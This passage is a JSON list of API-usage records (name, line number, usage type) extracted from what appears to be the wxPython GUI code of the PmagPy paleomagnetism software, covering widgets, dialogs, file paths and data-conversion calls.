{"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2736, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2736, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2738, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 2738, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2740, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2740, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2746, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2746, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2746, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2746, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2750, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2758, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2758, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2759, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2759, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2780, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2784, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2784, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2798, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2801, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2801, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2814, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2814, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2817, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.run_command_and_close_window", "line_number": 2819, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2819, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2822, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2822, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2832, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2834, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2834, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2841, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2842, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.ALWAYS_SHOW_SB", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 2844, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2844, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2859, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2859, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 2860, "usage_type": 
"call"}, {"api_name": "pmagpy.pmag", "line_number": 2860, "usage_type": "name"}, {"api_name": "wx.EVT_MENU", "line_number": 2867, "usage_type": "attribute"}, {"api_name": "pmagpy.mapping.map_magic.mapping", "line_number": 2913, "usage_type": "call"}, {"api_name": "pmagpy.mapping.map_magic", "line_number": 2913, "usage_type": "name"}, {"api_name": "pmagpy.mapping.map_magic.magic3_2_orient_magic_map", "line_number": 2913, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2927, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2928, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2928, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2929, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2929, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2930, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2931, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2931, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2932, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2933, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2933, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2934, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2936, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2937, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2939, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2939, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2941, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2944, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2945, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2946, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2946, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2948, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 2953, "usage_type": "attribute"}, {"api_name": "dialogs.magic_grid2.MagicGrid", "line_number": 2983, "usage_type": "call"}, {"api_name": "dialogs.magic_grid2", "line_number": 2983, "usage_type": "name"}, {"api_name": "dialogs.drop_down_menus3.Menus", "line_number": 3042, "usage_type": "call"}, {"api_name": "dialogs.drop_down_menus3", "line_number": 3042, "usage_type": "name"}, {"api_name": "wx.grid", "line_number": 3043, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 3048, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 3076, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3082, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 3085, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 
3085, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 3102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3102, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3118, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3133, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3154, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 3179, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3180, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3182, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3182, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.orientation_magic", "line_number": 3188, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 3188, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 3196, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3203, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3214, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.CANCEL", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3216, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3222, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3229, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3240, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3241, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3241, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3250, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3250, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3253, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3256, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3259, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3262, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3265, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3273, 
"usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3273, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3276, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3276, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3277, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 3278, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3278, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3279, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3299, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3300, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3303, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 3317, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3317, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 3318, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 3319, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3328, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3328, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3329, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3329, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3330, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3332, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3332, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3333, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3353, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3353, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3370, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3396, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3421, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3425, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3435, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3436, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3436, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3443, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3444, "usage_type": 
"call"}, {"api_name": "wx.CheckBox", "line_number": 3445, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3446, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3447, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3448, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3449, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3450, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3451, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3452, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3463, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3464, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3466, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 3467, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3473, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3473, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3474, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3474, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3475, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3477, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3477, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3478, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3491, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3491, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3500, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3545, "usage_type": "attribute"}]}